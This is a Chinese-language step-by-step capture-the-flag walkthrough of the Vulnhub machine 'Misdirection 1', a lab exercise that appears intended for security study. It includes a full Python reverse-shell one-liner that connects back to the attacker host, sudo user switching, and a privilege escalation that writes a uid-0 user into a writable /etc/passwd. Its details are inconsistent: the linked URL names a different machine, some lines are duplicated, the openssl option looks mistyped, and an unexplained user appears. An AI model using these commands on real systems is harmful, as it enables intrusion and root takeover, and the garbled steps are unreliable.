Vulnhub—靶机—Misdirection 1
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
地址:https://www.vulnhub.com/entry/symfonos-52,415/
一、信息收集
【步骤一】使用nmap确定目标靶机地址:
【命令】nmap -sP 192.168.110.0/24
【步骤二】对目标靶机进行全端口扫描:
【命令】nmap -n -sC -sV -p- 192.168.110.130
【步骤三】目标开放80及8080俩个http服务端口,使用dirb进行目录枚举
【命令】dirb http://192.168.110.130:80
【命令】nmap -n -sC -sV -p- 192.168.110.130
【命令】dirb http://192.168.110.130:8080
【步骤四】访问web目录
【命令】http://192.168.110.130:8080/debug
【分析】80端口目录都是空的可能是蜜罐,8080端口下面debug发现是一个webshell
二、漏洞利用
【步骤五】kali上使用nc监听1234端口,web上执行python反弹shell
【命令】
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.128",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
【分析】80端口目录都是空的可能是蜜罐,8080端口下面debug发现是一个webshell
【步骤六】sudo切换用户
【命令】Sudo -u brexit /bin/bash
【分析】在home下发现名为brexit的目录,但是没有查看权限,查看配置文件发现存在brexit这个用户,尝试使用sudo切换用户
【步骤七】查看用户文件权限
【命令】ls -la
【分析】查看etc下配置文件权限,发现passwd文件有可写入权限
【步骤八】写入一个用户uid为0,使用openssl对准备使用的密码进行加密
【命令】Openssl passwd -l 123456
【步骤九】切换用户enst查看flag
【命令】su - enst
三、Flag
【flag】:0d2c6222bfdd3701e0fa12a9a9dc9c8c